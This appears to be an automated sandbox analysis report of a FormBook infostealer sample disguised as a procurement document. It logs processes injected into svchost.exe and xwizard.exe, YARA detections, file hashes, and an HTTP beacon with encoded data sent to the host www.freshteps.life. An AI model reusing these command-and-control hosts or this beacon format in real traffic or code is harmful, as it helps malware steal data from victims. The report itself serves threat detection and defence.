                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.11.2049775209.74.79.41807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:46.840627909 CET444OUTGET /qp01/?QT=ZPOD+BqQao/QyIxulVjbDCVFLb7RjhwyuULyKVNAiV+MeP7iuxHdlS3JdohyzquBitQvx+Sc1DnyV4OJvwDeoSt18py19YLRfjflEWoNZD6QwIJxPVF50MQ=&LLp=-2JPqdjXxxH4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        Host: www.freshteps.life
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Dec 10, 2024 18:49:47.014662027 CET548INHTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:46 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:12:47:42
                                                        Start date:10/12/2024
                                                        Path:C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"
                                                        Imagebase:0x490000
                                                        File size:1'179'648 bytes
                                                        MD5 hash:464587C795EFBA3D6A77D78AB9F3DE32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:12:47:43
                                                        Start date:10/12/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"
                                                        Imagebase:0xdf0000
                                                        File size:47'016 bytes
                                                        MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.64234129622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:12:48:05
                                                        Start date:10/12/2024
                                                        Path:C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe"
                                                        Imagebase:0x280000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.65194174244.0000000005260000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:4
                                                        Start time:12:48:06
                                                        Start date:10/12/2024
                                                        Path:C:\Windows\SysWOW64\xwizard.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\xwizard.exe"
                                                        Imagebase:0xa70000
                                                        File size:55'808 bytes
                                                        MD5 hash:8581F29C5F84B72C053DBCC5372C5DB6
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.65192118300.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:5
                                                        Start time:12:48:19
                                                        Start date:10/12/2024
                                                        Path:C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe"
                                                        Imagebase:0x280000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:6
                                                        Start time:12:48:31
                                                        Start date:10/12/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff7a4780000
                                                        File size:597'432 bytes
                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Disassembly

                                                        No disassembly